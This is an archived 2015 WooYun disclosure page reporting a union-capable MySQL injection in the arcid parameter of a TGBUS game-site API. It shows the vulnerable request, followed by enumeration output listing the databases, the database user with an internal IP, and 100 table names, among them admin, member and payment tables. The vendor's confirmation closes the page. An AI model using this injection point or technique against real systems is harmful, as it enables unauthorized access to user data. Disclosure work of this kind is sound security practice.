当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099550

漏洞标题:电玩巴士某站MYSQL注入支持union

相关厂商:电玩巴士

漏洞作者: Forever80s

提交时间:2015-03-05 09:48

修复时间:2015-04-20 14:22

公开时间:2015-04-20 14:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-05: 细节已通知厂商并且等待厂商处理中
2015-03-05: 厂商已经确认,细节仅向厂商公开
2015-03-15: 细节向核心白帽子及相关领域专家公开
2015-03-25: 细节向普通白帽子公开
2015-04-04: 细节向实习白帽子公开
2015-04-20: 细节向公众公开

简要描述:

详细说明:

网站:doubi.tgbus.com参数arcid

GET /api/index.do?single=doubi&callback=jQuery18300961274579167366_1425390140965&method=tgbus.doubi.login.init&arcid=28034&_=1425390145552 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) 
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Cache-Control: no-cache
Host: doubi.tgbus.com
Accept-Encoding: gzip, deflate


POC:

available databases [3]:                                                              
[*] information_schema
[*] test
[*] tgbus_db.mmo2
database management system users [1]:                                                 
[*] 'tgbus_db.mmo2'@'172.30.26.24'


莫非不出数据给的rank就少吗

Database: `tgbus_db.mmo2`                                                             
[100 tables]
+-----------------------+
| dede_addon17          |
| dede_addon18          |
| dede_addon19          |
| dede_addonarticle     |
| dede_addonimages      |
| dede_addoninfos       |
| dede_addonshop        |
| dede_addonsoft        |
| dede_addonspec        |
| dede_admin            |
| dede_admintype        |
| dede_advancedsearch   |
| dede_arcatt           |
| dede_arccache         |
| dede_archives         |
| dede_arcmulti         |
| dede_arcrank          |
| dede_arctiny          |
| dede_arctype          |
| dede_area             |
| dede_channeltype      |
| dede_co_htmls         |
| dede_co_mediaurls     |
| dede_co_note          |
| dede_co_onepage       |
| dede_co_urls          |
| dede_diyforms         |
| dede_dl_log           |
| dede_doubi_userinfo   |
| dede_downloads        |
| dede_erradd           |
| dede_feedback         |
| dede_flink            |
| dede_flinktype        |
| dede_freelist         |
| dede_homepageset      |
| dede_keywords         |
| dede_log              |
| dede_member           |
| dede_member_company   |
| dede_member_feed      |
| dede_member_flink     |
| dede_member_friends   |
| dede_member_group     |
| dede_member_guestbook |
| dede_member_model     |
| dede_member_msg       |
| dede_member_operation |
| dede_member_person    |
| dede_member_pms       |
| dede_member_snsmsg    |
| dede_member_space     |
| dede_member_stow      |
| dede_member_stowtype  |
| dede_member_tj        |
| dede_member_type      |
| dede_member_vhistory  |
| dede_moneycard_record |
| dede_moneycard_type   |
| dede_mtypes           |
| dede_multiserv_config |
| dede_myad             |
| dede_myadtype         |
| dede_mytag            |
| dede_payment          |
| dede_plus             |
| dede_purview          |
| dede_pwd_tmp          |
| dede_ratings          |
| dede_scores           |
| dede_search_cache     |
| dede_search_keywords  |
| dede_sgpage           |
| dede_shops_delivery   |
| dede_shops_orders     |
| dede_shops_products   |
| dede_shops_userinfo   |
| dede_softconfig       |
| dede_sphinx           |
| dede_stepselect       |
| dede_sys_enum         |
| dede_sys_module       |
| dede_sys_set          |
| dede_sys_task         |
| dede_sysconfig        |
| dede_tagindex         |
| dede_taglist          |
| dede_uploads          |
| dede_verifies         |
| dede_view_arcomment   |
| dede_vote             |
| dede_vote_member      |
| doubi_comment_detail  |
| doubi_comment_log     |
| duoshuo_commentmeta   |
| tg_configure          |
| tg_upload             |
| tg_user_group         |
| tg_users              |
| tg_vote               |
+-----------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 Forever80s@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-03-05 10:09

厂商回复:

感谢白帽"Forever80s"的热心指正.已确认bug并已转到开发维护.

最新状态:

暂无